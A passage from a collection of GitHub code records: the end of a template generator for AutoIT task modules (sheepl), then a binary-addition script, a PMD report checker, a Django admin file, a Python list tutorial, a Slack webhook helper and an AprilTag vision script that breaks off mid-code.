by passing the arguments\n as keywords to the staticmethod of the task object\n .create_autoIT_block(self.csh, \n # add in other arguments\n # for object constructor\n # ---------------------> \n parm1=self.parm1_value,\n parm2=self.parm3_value\n # ---------------------> \n )\n Non-Interactive Profile\n This takes an input from the sheepl object\n and this creates a Profile() object. See profile.py\n \\\"\"\"\n \"\"\".format(self.name)\n\n return textwrap.dedent(class_notes)\n\n\n def template_author_details(self):\n \"\"\"\n Creates the author details\n \"\"\"\n\n author_notes = \"\"\"\n __author__ = \"\"\n __license__ = \"MIT\"\n \"\"\"\n\n return textwrap.dedent(author_notes) \n\n\n def template_modules(self):\n \"\"\"\n Imports common modules to be used across all templates\n \"\"\"\n\n module_imports = \"\"\"\n import cmd\n import sys\n import random\n import textwrap\n\n from utils.base.base_cmd_class import BaseCMD\n \"\"\"\n\n return textwrap.dedent(module_imports)\n\n\n # #######################################################################\n # Template CMD Definition\n # #######################################################################\n\n\n def template_class_cmd_declaration(self):\n \"\"\"\n Main Class Declaration\n \"\"\"\n\n class_declaration = \"\"\"\n\n # #######################################################################\n # Task CMD Class Module Loaded into Main Sheepl Console\n # #######################################################################\n\n\n class TaskConsole(BaseCMD):\n \"\"\"\n return textwrap.dedent(class_declaration)\n\n\n def template_class_cmd_internals(self):\n\n class_internals = \"\"\"\n \\\"\"\"\n Inherits from BaseCMD\n This parent class contains:\n : do_back > return to main menu\n : do_discard > discard current task\n : complete_task() > completes the task and resets trackers\n : check_task_started > checks to see task status\n \\\"\"\"\n \"\"\"\n \n class_internals += \"\"\"\n def __init__(self, csh, cl):\n\n # Calling super to inherit from the BaseCMD Class __init__\n super(TaskConsole, self).__init__(csh, cl)\n\n \"\"\"\n\n class_internals += \"\"\"\n # Override the defined task name\n self.taskname = '{}'\n # Overrides Base Class Prompt Setup \n self.baseprompt = cl.yellow('{} >: {} :> '.format(csh.name.lower()))\n self.prompt = self.baseprompt\n \"\"\".format(self.name, '{}', self.name.lower())\n\n class_internals += \"\"\"\n # creating my own \n self.introduction = \\\"\"\"\n ----------------------------------\n \"\"\"\n\n class_internals += self.indent_space + \"[!] {} Interaction.\".format(self.name)\n\n class_internals += \"\"\"\n Type help or ? 
to list commands.\n ----------------------------------\n 1: Start a new block using 'new'\n 2: ######### > add in steps\n 3: Complete the interaction using 'complete'\n \\\"\"\"\n print(textwrap.dedent(self.introduction))\n \n # ----------------------------------- >\n # Task Specific Variables\n # ----------------------------------- >\n\n # List to hold commands for current interaction\n # self.commands = []\n\n # Configures Subtasking\n # self.subtask_supported = True\n\n # empty subtask dictionary to hold assigned tasks\n # self.subtasks = \\{\\}\n \"\"\"\n\n return textwrap.indent(textwrap.dedent(class_internals), self.indent_space)\n\n\n def template_common_cmd_functions_new(self):\n \"\"\"\n Creates new common function\n \"\"\"\n\n task_common_functions_new = \"\"\"\n\n # --------------------------------------------------->\n # Task CMD Functions\n # --------------------------------------------------->\n\n def do_new(self, arg):\n \\\"\"\" \n This command creates a new Word document\n \\\"\"\"\n # Init tracking booleans\n # method from parent class BaseCMD\n # Inverse check to see if task has already started\n # Booleans are set in parent method\n \n # method from parent class BaseCMD\n if self.check_task_started() == False:\n print(\"[!] Starting : '{}_{}'\".format(str(self.csh.counter.current())))\n # OCD Line break\n print()\n self.prompt = self.cl.blue(\"[*] {}_{}\".format(str(self.csh.counter.current()))) + \"{}\" + self.baseprompt \n \"\"\".format(self.name, '{}', self.name, '{}','\\\\n')\n\n return textwrap.indent(textwrap.dedent(task_common_functions_new), self.indent_space)\n\n\n def template_common_cmd_functions_cmd(self):\n \"\"\"\n Common command loop\n \"\"\"\n\n task_common_function_commands = \"\"\"\n \n def do_cmd(self, command):\n \\\"\"\"\n First checks to see if a new {} Block has been started\n if so allows the command to be issued and then runs some checks\n or prompts to start a new interaction using 'new'\n Specify the command to run in the shell\n \\\"\"\"\n # Uncomment\n \\\"\"\"\n if command:\n if self.taskstarted == True: \n self.commands.append(command)\n else:\n if self.taskstarted == False:\n print(self.cl.red(\"[!] You need to start a new {} Interaction.\"))\n print(self.cl.red(\"[!] Start this with 'new' from the menu.\"))\n print(\"[!] 
You need to supply the command for typing\")\n pass\n \\\"\"\"\n \"\"\".format(self.name, self.name)\n\n return textwrap.indent(textwrap.dedent(task_common_function_commands), self.indent_space)\n\n\n def template_common_cmd_functions_complete(self):\n \"\"\"\n Creates complete common function\n \"\"\"\n\n task_common_functions_complete = \"\"\"\n \n def do_complete(self, arg):\n \\\"\"\"\n \n This command calls the constructor on the AutoITBlock\n with all the specific arguments\n >> Check the AutoIT constructor requirements\n \n setup create_internetexplorer for ease and clarity\n pass in unique constructor arguments for AutoITBlock\n \n \\\"\"\"\n\n # Call the static method in the task object\n if self.taskstarted:\n {}.create_autoIT_block(self.csh, \n # add in other arguments\n # for object constructor\n # ---------------------> \n ''\n # ---------------------> \n )\n\n # now reset the tracking values and prompt\n self.complete_task()\n\n \"\"\".format(self.name)\n \n return textwrap.indent(textwrap.dedent(task_common_functions_complete), self.indent_space)\n\n\n def template_helper_function_comment(self):\n \"\"\"\n Adds in the CMD util function comment space\n \"\"\"\n\n helper_function_comment = \"\"\"\n\n # --------------------------------------------------->\n # CMD Util Functions\n # --------------------------------------------------->\n\n \"\"\"\n\n return textwrap.indent(textwrap.dedent(helper_function_comment), self.indent_space)\n\n\n # #######################################################################\n # # # Template Task Definition\n # #######################################################################\n \n\n def template_task_class_definition(self):\n \"\"\" \n Creates the task subcode with inheritance\n \"\"\"\n\n template_task_class_definition = \"\"\"\n\n # #######################################################################\n # {} Class Definition\n # #######################################################################\n\n\n class {}:\n\n def __init__(self, csh, cl, **kwargs):\n self.__dict__.update(kwargs)\n self.csh = csh\n\n # Check if this task requires an AutoIT Specific UDF\n # this gets declared here and then pushed into the master\n # if not then this can be deleted\n # Sheepl AutoIT include header list as part of the 'csh' object\n\n # self.autoIT_include_statement = \"#include \"\n\n # Check to make sure it's not already there, and if not add\n # if not self.autoIT_include_statement in csh.autoIT_UDF_includes:\n # csh.autoIT_UDF_includes.append(self.autoIT_include_statement)\n\n if csh.interactive == True:\n # create the task based sub console\n self.TaskConsole = TaskConsole(csh, cl)\n self.TaskConsole.cmdloop() \n \n \n\n # --------------------------------------------------->\n # End {} Constructor\n # --------------------------------------------------->\n \"\"\".format(self.name, self.name, self.name, self.name)\n\n return textwrap.dedent(template_task_class_definition)\n\n\n def template_task_class_static_method_definition(self):\n \"\"\" \n Creates the task subcode with inheritance\n \"\"\"\n\n template_task_class_static_method_definition = \"\"\"\n\n # --------------------------------------------------->\n # {} Static Method\n # --------------------------------------------------->\n\n \\\"\"\"\n These are all the elements that get passed into the \n @static method as keyword arguments\n Essentially, this is everything that needs to be passed\n to create the InternetExplorer object\n\n Parse the 'kwargs' dictionary for the arguments\n 
\\\"\"\"\n\n @staticmethod\n def create_autoIT_block(csh, **kwargs):\n \\\"\"\"\n Creates the AutoIT Script Block\n Note :\n Kwargs returns a dictionary\n so these values can be referenced\n by the keys directly\n \n This now creates an instance of the object with the correct\n counter tracker, and then appends as a task\n Note : add in additional constructor arguments as highlighted\n which get passed in from the 'kwargs' dictionary\n\n \\\"\"\"\n\n csh.add_task('{}_' + str(csh.counter.current()),\n {}AutoITBlock(\n csh,\n str(csh.counter.current()),\n # add in other arguments\n # for object constructor\n # ---------------------> \n ''\n # ---------------------> \n ).create()\n )\n\n # --------------------------------------------------->\n # End {} Static Method\n # --------------------------------------------------->\n \"\"\".format(self.name, self.name, self.name, self.name)\n\n return textwrap.indent(textwrap.dedent(template_task_class_static_method_definition), self.indent_space) \n\n\n # #######################################################################\n # Template AutoITBlock Definition\n # #######################################################################\n\n\n def template_class_autoIT_block_definition(self):\n \"\"\"\n Creates the AutoIT block code\n \"\"\"\n\n autoIT_block_definition = \"\"\"\n\n # #######################################################################\n # {} AutoIT Block Definition\n # #######################################################################\n\n\n class {}AutoITBlock(object):\n \\\"\"\"\n Creates an AutoIT Code Block based on the current counter\n then returns this to Task Console which pushes this up to the Sheepl Object\n with a call to create.\n String returns are pushed through (textwrap.dedent) to strip off indent tabs\n\n Build out your constructor based on what the object takes\n \\\"\"\"\n\n def __init__(self, csh, counter):\n\n self.csh = csh\n self.counter = counter\n self.indent_space = ' '\n\n\n def func_dec(self):\n \\\"\"\"\n Initial Entrypoint Definition for AutoIT function\n when using textwrap.dedent you need to add in the backslash\n to the start of the multiline\n \\\"\"\"\n\n function_declaration = \\\"\"\"\\\n\n \"\"\".format(self.name, self.name)\n\n autoIT_block_definition += self.helper_create_func_declaration_header(self.name)\n\n autoIT_block_definition += \"\"\"\n\n \\\"\"\"\n if self.csh.creating_subtasks == False:\n function_declaration += \"{}_{}()\".format(str(self.counter))\n\n return textwrap.dedent(function_declaration)\n \n \"\"\".format(self.name, '{}')\n \n return textwrap.dedent(autoIT_block_definition)\n\n\n def template_class_autoIT_block_open(self):\n \"\"\"\n Initialises the common operation for opening the program\n this is normally invoked via the 'run' command\n\n \"\"\"\n\n open_program_call = \"\"\"\n\n def open_{}(self):\n \\\"\"\"\n Creates the AutoIT Function Declaration Entry\n \\\"\"\"\n\n \\\"\"\"\n # Note a weird bug that the enter needs to be \n # passed as format string argument as escaping\n # is ignored on a multiline for some reason\n # if it gets sent as an individual line as in text_typing_block()\n # >> typing_text += \"Send('exit{}')\"\n # everything works. 
Strange, Invoke-OCD, and then stop caring\n # and push it through the format string.\n\n # Note > Send('yourprogram{}')\n # Example : Send('powershell{}')\n \\\"\"\"\n\n _open_{} = \\\"\"\"\n \n Func {}_{}()\n\n ; Creates a {} Interaction\n\n Send(\"#r\")\n ; Wait 10 seconds for the Run dialogue window to appear.\n WinWaitActive(\"Run\", \"\", 10)\n ; note this needs to be escaped\n ; \n Send('cmd{}') \n ; Keep Window in focus\n WinWaitActive('#', \"\", 10)\n SendKeepActive('#')\n\n \\\"\"\".format(self.counter)\n\n return textwrap.dedent(_open_{}) \n \"\"\".format(\n self.name,\n '{ENTER}', '{ENTER}', '{ENTER}',\n self.name, \n self.name, '{}',\n self.name,\n '{ENTER}',\n self.name\n )\n\n return textwrap.indent(textwrap.dedent(open_program_call), self.indent_space)\n\n\n def template_class_autoIT_block_typing(self):\n \"\"\"\n Creates the AutoIT typing block\n \"\"\"\n\n autoIT_text_typing_block = \"\"\"\n\n def text_typing_block(self):\n \\\"\"\"\n Takes the Typing Text Input\n \\\"\"\"\n \n typing_text = 'Send(\"\")'\n # now loop round the input_text\n # represents how someone would use the enter key when typing\n \n\n for command in self.commands:\n # these are individual send commands so don't need to be wrapped in a block\n typing_text += 'Send(\"' + command + '{}\")'\n command_delay = str(random.randint(2000, 20000))\n typing_text += 'sleep(' + command_delay + ')'\n \n # add in exit\n typing_text += 'Send(\"exit{}\")'\n typing_text += \"; Reset Focus\"\n typing_text += 'SendKeepActive(\"\")'\n\n return textwrap.indent(typing_text, self.indent_space)\n\n \"\"\".format(\n \"{ENTER}\",\n \"{ENTER}\"\n )\n\n return textwrap.indent(textwrap.dedent(autoIT_text_typing_block), self.indent_space)\n\n\n def template_class_autoIT_block_close(self):\n \"\"\"\n Creates the AutoIT Close block\n \"\"\"\n \n close_program_call = \"\"\"\n def close_{}(self): \n \\\"\"\"\n Closes the {} application function declaration\n \\\"\"\"\n\n end_func = \\\"\"\"\n\n EndFunc\n\n \\\"\"\"\n\n return textwrap.dedent(end_func)\n \"\"\".format(self.name, self.name)\n\n return textwrap.indent(textwrap.dedent(close_program_call), self.indent_space)\n\n\n def template_class_autoIT_create(self):\n \"\"\"\n Creates the main call to the constructor function for the object\n make sure to pass in the constructor parameters based on what has been \n defined in this task constructor\n \"\"\"\n\n autoIT_create = \"\"\"\n def create(self):\n \\\"\"\" \n Grabs all the output from the respective functions and builds the AutoIT output\n \\\"\"\"\n\n # Add in the constructor calls\n\n autoIT_script = (self.func_dec() +\n '' +\n self.text_typing_block() +\n ''\n )\n\n return autoIT_script\n\n \"\"\"\n\n return textwrap.indent(textwrap.dedent(autoIT_create), self.indent_space)\n\n\n # #######################################################################\n # Template Helper Functions \n # #######################################################################\n\n\n def helper_create_func_declaration_header(self, name):\n \"\"\"\n Simple wrapper function to properly work out \n the formatting size of the header\n keeps the code clean and my OCD in check\n \"\"\"\n\n dash = \"-\"\n space = ' '\n left_bar = \"; < -------\"\n right_bar = \"------- >\"\n middle = \"; \"\n indent = ' '\n\n title_length = len(self.name + \" Interaction\")\n\n top_bar = left_bar + (dash * title_length) + right_bar\n middle_bar = middle + space + (self.name + \" Interaction\") + space \n bottom_bar = left_bar + (dash * title_length) + right_bar\n\n\n # 
No idea why a) I thought this was a good idea, and b)\n # why you have to multiply the idents\n # ultimately though, the textwrap library strips all this\n # out so it's only needed for cleanliness to push this over\n # all this to make a dynamically expanding title box.\n\n return (\n (indent * 2) + top_bar + \"\\n\" + \n (indent * 4) + middle_bar + \"\\n\" +\n (indent * 4) + bottom_bar\n )\n\n\n \n","repo_name":"lorentzenman/sheepl","sub_path":"template/template.py","file_name":"template.py","file_ext":"py","file_size_in_byte":23776,"program_lang":"python","lang":"en","doc_type":"code","stars":390,"dataset":"github-code","pt":"61"} +{"seq_id":"40465230496","text":"#author Sila2000\r\n#binary number pertained only to positive integer\r\ndef carry_bit_add(bit1, bit2):\r\n if bit1 == bit2 == '0':\r\n return '0'\r\n elif bit1 == '0' and bit2 == '1':\r\n return '0'\r\n elif bit1 == '1' and bit2 == '0':\r\n return '0'\r\n elif bit1 == '1' and bit2 == '1':\r\n return '1'\r\n\r\n\r\ndef sum_bit_add(bit1, bit2):\r\n if bit1 == bit2 == '0':\r\n return '0'\r\n elif bit1 == '0' and bit2 == '1':\r\n return '1'\r\n elif bit1 == '1' and bit2 == '0':\r\n return '1'\r\n elif bit1 == '1' and bit2 == '1':\r\n return '0'\r\n\r\n\r\ndef bin_extender(bin1, bin2):\r\n bin1_list = list(map(str, bin1))\r\n bin2_list = list(map(str, bin2))\r\n\r\n if len(bin1_list) >= len(bin2_list):\r\n bin1_list.insert(0, '0')\r\n bin2_list = ['0'] * (len(bin1_list) - len(bin2_list)) + bin2_list\r\n return bin1_list, bin2_list\r\n else:\r\n bin2_list.insert(0, '0')\r\n bin1_list = ['0'] * (len(bin2_list) - len(bin1_list)) + bin1_list\r\n return bin1_list, bin2_list\r\n\r\n\r\nresult = []\r\n\r\n\r\ndef bin_adder(bin1, bin2):\r\n bin_set = bin_extender(bin1, bin2)\r\n bin1_list = bin_set[0]\r\n bin2_list = bin_set[1]\r\n\r\n carry_bits = []\r\n sum_bits = []\r\n #after using bin_extender function upon bin1 and bin2, bin1_list and bin2_list are of same length\r\n for i in range(len(bin1_list)):\r\n carry_bits.append(carry_bit_add(bin1_list[i], bin2_list[i]))\r\n sum_bits.append(sum_bit_add(bin1_list[i], bin2_list[i]))\r\n\r\n result.insert(0, sum_bits[len(sum_bits) - 1])\r\n sum_bits.pop(len(sum_bits) - 1)\r\n\r\n #check whether all elements of sum_bits and carry_bits are zero or not\r\n count_sum_zero = 0\r\n count_carry_zero = 0\r\n\r\n for i in range(len(sum_bits)):\r\n if sum_bits[i] == '0':\r\n count_sum_zero += 1\r\n for i in range(len(carry_bits)):\r\n if carry_bits[i] == '0':\r\n count_carry_zero += 1\r\n\r\n if count_carry_zero == len(carry_bits) and count_sum_zero == len(sum_bits):\r\n return ''.join(map(str, result))\r\n else:\r\n bin1 = ''.join(map(str, sum_bits))\r\n bin2 = ''.join(map(str, carry_bits))\r\n return bin_adder(bin1, bin2)\r\n\r\n\r\nprint(\"Binary addition (Only Integral):\")\r\nbit_num1 = str(input(\"Enter the 1st binary number: \"))\r\nbit_num2 = str(input(\"Enter the 2nd binary number: \"))\r\n\r\nprint(f\"{bit_num1} + {bit_num2} = \", bin_adder(bit_num1, bit_num2))\r\n","repo_name":"Sila2000/Working_with_Binary","sub_path":"bin_adder (positive_integer).py","file_name":"bin_adder (positive_integer).py","file_ext":"py","file_size_in_byte":2430,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"26327623323","text":"#!/usr/bin/env python3\n\nimport os\nimport sys\nimport glob\nimport yaml\nimport xml.etree.ElementTree as ET\n\n# 1 is highest, 5 is lowest, cf https://pmd.sourceforge.io/pmd-5.3.3/customizing/rule-guidelines.html\nfindings = {\n 
'1': 0,\n '2': 0,\n '3': 0,\n '4': 0,\n '5': 0,\n}\n\nconfig = None\nwith open(\".pipeline/config.yml\", \"r\") as stream:\n try:\n config = yaml.safe_load(stream)\n except yaml.YAMLError as exc:\n print(exc)\n\nthreshold_high = int(config['stages']['codeCheck']['pmd']['high'])\nthreshold_normal = int(config['stages']['codeCheck']['pmd']['normal'])\nthreshold_low = int(config['stages']['codeCheck']['pmd']['low'])\n\nall_pmd_report_files = glob.glob('**/pmd.xml', recursive=True)\nfor pmd_report_file in all_pmd_report_files:\n if os.path.isfile(pmd_report_file):\n parsed_pmd_report = ET.parse(pmd_report_file)\n pmd_report = parsed_pmd_report.getroot().findall('{http://pmd.sourceforge.net/report/2.0.0}file')\n for sdk_source_file in pmd_report:\n print(f\"File: .{sdk_source_file.attrib['name'].removeprefix(os.getcwd())}\")\n for violation in sdk_source_file.findall('{http://pmd.sourceforge.net/report/2.0.0}violation'):\n ET.dump(violation)\n findings[str(violation.attrib['priority'])] += 1\n print(f\" - Rule: {violation.attrib['rule']}\")\n print(f\" Priority: {violation.attrib['priority']}\")\n print(f\" Message: {violation.text.strip()}\")\n print(f\" Line: {violation.attrib['beginline']}\")\n print()\n\nhigh_findings = findings['1'] + findings['2']\nnormal_findings = findings['3']\nlow_findings = findings['4'] + findings['5']\n\nallowed_high = threshold_high if threshold_high >= 0 else 'unlimited'\nallowed_normal = threshold_normal if threshold_normal >= 0 else 'unlimited'\nallowed_low = threshold_low if threshold_low >= 0 else 'unlimited'\n\nif 'GITHUB_STEP_SUMMARY' in os.environ:\n with open(os.environ[\"GITHUB_STEP_SUMMARY\"], \"a\") as f:\n print('## PMD Result', file=f)\n print('| Category | Actual Findings | Allowed Findings |', file=f)\n print('| -------- | --------------- | ---------------- |', file=f)\n print(f\"| High | {high_findings} | {allowed_high} |\", file=f)\n print(f\"| Normal | {normal_findings} | {allowed_normal} |\", file=f)\n print(f\"| Low | {low_findings} | {allowed_low} |\", file=f)\n\nprint('pmd result:')\nprint(f\"warnings high: {high_findings}, allowed are {allowed_high}\")\nprint(f\"warnings normal: {normal_findings}, allowed are {allowed_normal}\")\nprint(f\"warnings low: {low_findings}, allowed are {allowed_low}\")\n\nif threshold_high >= 0 and high_findings > threshold_high:\n sys.exit('PMD exceeded threshold for high findings')\nelif threshold_normal >= 0 and normal_findings > threshold_normal:\n sys.exit('PMD exceeded threshold for normal findings')\nelif threshold_low >= 0 and low_findings > threshold_low:\n sys.exit('PMD exceeded threshold for low findings')\n","repo_name":"SAP/cloud-sdk-java","sub_path":".pipeline/scripts/print-pmd.py","file_name":"print-pmd.py","file_ext":"py","file_size_in_byte":3027,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"61"} +{"seq_id":"3312381508","text":"from django.contrib import admin\nfrom .models import Profile, MessageProfile\n# from .forms import ProfileForm\n\n\n@admin.register(Profile)\nclass ProfileAdmin(admin.ModelAdmin):\n list_display = ('username', 'id', \"id_telegram\", 'email')\n list_filter = (\"username\", 'id')\n search_fields = (\"id_telegram\", 'id')\n # # form = ProfileForm\n\n\n@admin.register(MessageProfile)\nclass MessageProfileAdmin(admin.ModelAdmin):\n list_display = ('id_profile', 'coin', 'currency', 'price', 'created_at', 'tracking_status')\n list_filter = ('coin', 'currency', 'created_at', 'tracking_status')\n search_fields = ('id_profile', 'coin', 
'currency', 'created_at', 'tracking_status')\n","repo_name":"Dimskay1988/CryptoAnalytics","sub_path":"apps/Employees/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":678,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"29410446717","text":"#!/usr/bin/env python3\n\ndef main():\n proto = [\"ssh\", \"http\", \"https\"]\n protoa = [\"ssh\", \"http\", \"https\"]\n print(proto)\n proto.append(\"dns\") # this line will add \"dns\" at the end of our list\n protoa.append(\"dns\") # this line will add \"dns\" at the end of our list\n print(proto)\n proto2 = [22, 80, 443, 53] # a list of common ports\n proto.extend(proto2) # pass proto2 as an argument to the extend\n print(proto)\n protoa.append(proto2) # pass proto2 as an argument to the append method\n \n\n # Current contents of list\n print(protoa)\n # Remove and print last element until list is empty.\n while len(protoa):\n print(protoa.pop())\n print(protoa)\n\n # One line approach\n print(proto)\n proto.clear()\n print(proto)\n \n\nif __name__ == '__main__':\n main()\n","repo_name":"segarciat/mycode","sub_path":"tutorials/lab33-list-methods/listmeth02.py","file_name":"listmeth02.py","file_ext":"py","file_size_in_byte":813,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"44380506665","text":"import json\nimport requests\n\nfrom django.conf import settings\n\n'''\nThis is an example of how to send data to Slack webhooks in Python with the\nrequests module.\nDetailed documentation of Slack Incoming Webhooks:\nhttps://api.slack.com/incoming-webhooks\n'''\n\n\ndef slack_message(string):\n webhook_url = settings.SLACK_WEB_HOOK\n print(webhook_url)\n slack_data = {'text': string}\n\n response = requests.post(\n webhook_url, data=json.dumps(slack_data),\n headers={'Content-Type': 'application/json'}\n )\n if response.status_code != 200:\n raise ValueError(\n 'Request to slack returned an error %s, the response is:\\n%s'\n % (response.status_code, response.text)\n )\n\n return response.status_code\n","repo_name":"NPeredoEsquivel/Backend-Test-Peredo","sub_path":"yumminess/slackmessage.py","file_name":"slackmessage.py","file_ext":"py","file_size_in_byte":754,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"8606939043","text":"# Import the camera server\r\nfrom cscore import CameraServer\r\nimport ntcore\r\nfrom ntcore import NetworkTableInstance\r\nfrom enum import Enum\r\n\r\nimport robotpy_apriltag\r\nimport cv2\r\nimport numpy as np\r\nimport time\r\nX_RES = 320\r\nY_RES = 240\r\nSECOND_COUNTER = 1\r\nDEBUG_MODE_DEFAULT = False\r\nTHREADS_DEFAULT = 3\r\nDECIMATE_DEFAULT = 1.0\r\nBLUR_DEFAULT = 0.0\r\nREFINE_EDGES_DEFAULT = 1\r\nSHARPENING_DEFAULT = 0.25\r\nAPRILTAG_DEBUG_MODE_DEFAULT = False\r\nDECISION_MARGIN_DEFAULT = 125\r\n\r\nclass NTConnectType(Enum):\r\n SERVER = 1\r\n CLIENT = 2\r\n\r\nclass NTGetString:\r\n def __init__(self, stringTopic: ntcore.StringTopic, init, default, failsafe):\r\n self.init = init\r\n self.default = default\r\n self.failsafe = failsafe\r\n # start subscribing; the return value must be retained.\r\n # the parameter is the default value if no value is available when get() is called\r\n self.stringTopic = stringTopic.getEntry(failsafe)\r\n\r\n self.stringTopic.setDefault(default)\r\n self.stringTopic.set(init)\r\n\r\n def get(self):\r\n return self.stringTopic.get(self.failsafe)\r\n\r\n def set(self, string):\r\n 
self.stringTopic.set(string)\r\n\r\n def unpublish(self):\r\n # you can stop publishing while keeping the subscriber alive\r\n self.stringTopic.unpublish()\r\n\r\n def close(self):\r\n # stop subscribing/publishing\r\n self.stringTopic.close()\r\n\r\nclass NTGetDouble:\r\n def __init__(self, dblTopic: ntcore.DoubleTopic, init, default, failsafe):\r\n self.init = init\r\n self.default = default\r\n self.failsafe = failsafe\r\n # start subscribing; the return value must be retained.\r\n # the parameter is the default value if no value is available when get() is called\r\n self.dblTopic = dblTopic.getEntry(failsafe)\r\n self.dblTopic.setDefault(default)\r\n self.dblTopic.set(init)\r\n\r\n def get(self):\r\n return self.dblTopic.get(self.failsafe)\r\n\r\n def set(self, double):\r\n self.dblTopic.set(double)\r\n\r\n def unpublish(self):\r\n # you can stop publishing while keeping the subscriber alive\r\n self.dblTopic.unpublish()\r\n\r\n def close(self):\r\n # stop subscribing/publishing\r\n self.dblTopic.close()\r\n\r\nclass NTGetBoolean:\r\n def __init__(self, boolTopic: ntcore.BooleanTopic, init, default, failsafe):\r\n self.init = init\r\n self.default = default\r\n self.failsafe = failsafe\r\n\r\n # start subscribing; the return value must be retained.\r\n # the parameter is the default value if no value is available when get() is called\r\n self.boolTopic = boolTopic.getEntry(failsafe)\r\n\r\n self.boolTopic.setDefault(default)\r\n self.boolTopic.set(init)\r\n\r\n def get(self):\r\n return self.boolTopic.get(self.failsafe)\r\n def set(self, boolean):\r\n self.boolTopic.set(boolean)\r\n def unpublish(self):\r\n # you can stop publishing while keeping the subscriber alive\r\n self.boolTopic.unpublish()\r\n\r\n def close(self):\r\n # stop subscribing/publishing\r\n self.boolTopic.close()\r\n\r\nntconnect = NTConnectType(NTConnectType.SERVER)\r\n\r\ndef main():\r\n # start NetworkTables\r\n ntinst = NetworkTableInstance.getDefault()\r\n if ntconnect == NTConnectType.SERVER:\r\n ntinst.startServer()\r\n else:\r\n ntinst.startClient4(\"raspberrypi910\")\r\n \r\n detector = robotpy_apriltag.AprilTagDetector()\r\n detectorConfig = robotpy_apriltag.AprilTagDetector.Config()\r\n \r\n # Table for vision output information\r\n \r\n uptime_ntt = NTGetDouble(ntinst.getDoubleTopic(\"/Vision/Uptime\"), 0, 0, -1)\r\n debug_ntt = NTGetBoolean(ntinst.getBooleanTopic(\"/Vision/Debug Mode\"), False, DEBUG_MODE_DEFAULT, DEBUG_MODE_DEFAULT)\r\n threads_ntt = NTGetDouble(ntinst.getDoubleTopic(\"/Vision/Threads\"),THREADS_DEFAULT, THREADS_DEFAULT, THREADS_DEFAULT)\r\n quadDecimate_ntt = NTGetDouble(ntinst.getDoubleTopic(\"/Vision/Decimate\"),DECIMATE_DEFAULT, DECIMATE_DEFAULT, DECIMATE_DEFAULT)\r\n blur_ntt = NTGetDouble(ntinst.getDoubleTopic(\"/Vision/Blur\"),BLUR_DEFAULT, BLUR_DEFAULT, BLUR_DEFAULT) \r\n refineEdges_ntt = NTGetDouble(ntinst.getDoubleTopic(\"/Vision/Edge Refine\"),REFINE_EDGES_DEFAULT, REFINE_EDGES_DEFAULT, REFINE_EDGES_DEFAULT) \r\n decodeSharpening_ntt = NTGetDouble(ntinst.getDoubleTopic(\"/Vision/Sharpening\"), SHARPENING_DEFAULT, SHARPENING_DEFAULT, SHARPENING_DEFAULT)\r\n ATDebug_ntt = NTGetBoolean(ntinst.getBooleanTopic(\"/Vision/April Tag Debug\"), APRILTAG_DEBUG_MODE_DEFAULT, APRILTAG_DEBUG_MODE_DEFAULT, APRILTAG_DEBUG_MODE_DEFAULT)\r\n decision_margin_ntt = NTGetDouble(ntinst.getDoubleTopic(\"/Vision/Decision Margin\"), DECISION_MARGIN_DEFAULT, DECISION_MARGIN_DEFAULT, DECISION_MARGIN_DEFAULT)\r\n\r\n detectorConfig.numThreads = THREADS_DEFAULT\r\n detectorConfig.quadDecimate = 
DECIMATE_DEFAULT\r\n detectorConfig.quadSigma = BLUR_DEFAULT\r\n detectorConfig.refineEdges = REFINE_EDGES_DEFAULT\r\n detectorConfig.decodeSharpening = SHARPENING_DEFAULT\r\n detectorConfig.debug = APRILTAG_DEBUG_MODE_DEFAULT\r\n detector.setConfig(detectorConfig)\r\n detector.addFamily(\"tag16h5\")\r\n \r\n\r\n # Wait for NetworkTables to start\r\n time.sleep(0.5)\r\n\r\n # Capture from the first USB Camera on the system\r\n camera = CameraServer.startAutomaticCapture()\r\n camera.setResolution(X_RES, Y_RES)\r\n\r\n # Get a CvSink. This will capture images from the camera\r\n cvSink = CameraServer.getVideo()\r\n\r\n # (optional) Setup a CvSource. This will send images back to the Dashboard\r\n outputStream = CameraServer.putVideo(\"final image\", X_RES, Y_RES)\r\n\r\n # Allocating new images is very expensive, always try to preallocate\r\n img = np.zeros(shape=(X_RES, Y_RES, 3), dtype=np.uint8)\r\n\r\n print(\"Hello\")\r\n\r\n seconds = 0\r\n current_seconds = 0\r\n prev_seconds = 0\r\n while True:\r\n start_time = time.time()\r\n current_seconds = start_time\r\n if int(current_seconds - prev_seconds) >= SECOND_COUNTER:\r\n prev_seconds = current_seconds\r\n seconds = seconds + 1\r\n uptime_ntt.set(seconds)\r\n print(seconds)\r\n\r\n # Tell the CvSink to grab a frame from the camera and put it\r\n # in the source image. If there is an error notify the output.\r\n frame_time, img = cvSink.grabFrame(img)\r\n if frame_time == 0:\r\n # Send the output the error.\r\n outputStream.notifyError(cvSink.getError())\r\n # skip the rest of the current iteration\r\n continue\r\n\r\n #\r\n # Insert your image processing logic here!\r\n #\r\n gimg = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\r\n \r\n detectorConfig.numThreads = int(threads_ntt.get())\r\n detectorConfig.quadDecimate = quadDecimate_ntt.get()\r\n detectorConfig.quadSigma = blur_ntt.get()\r\n detectorConfig.refineEdges = refineEdges_ntt.get()\r\n detectorConfig.decodeSharpening = decodeSharpening_ntt.get()\r\n detectorConfig.debug = ATDebug_ntt.get()\r\n detector.setConfig(detectorConfig)\r\n \r\n detected = detector.detect(gimg)\r\n for tag in detected:\r\n if tag.getDecisionMargin() > decision_margin_ntt.get() and tag.getId() >= 1 and tag.getId() <= 8:\r\n if debug_ntt.get() == True:\r\n \r\n x0 = int(tag.getCorner(0).x)\r\n y0 = int(tag.getCorner(0).y)\r\n x1 = int(tag.getCorner(1).x)\r\n y1 = int(tag.getCorner(1).y)\r\n x2 = int(tag.getCorner(2).x)\r\n y2 = int(tag.getCorner(2).y)\r\n x3 = int(tag.getCorner(3).x)\r\n y3 = int(tag.getCorner(3).y)\r\n\r\n cv2.line(img, (x0, y0), (x1, y1), (0,255,0), 20) #starts at top left corner of apriltag\r\n cv2.line(img, 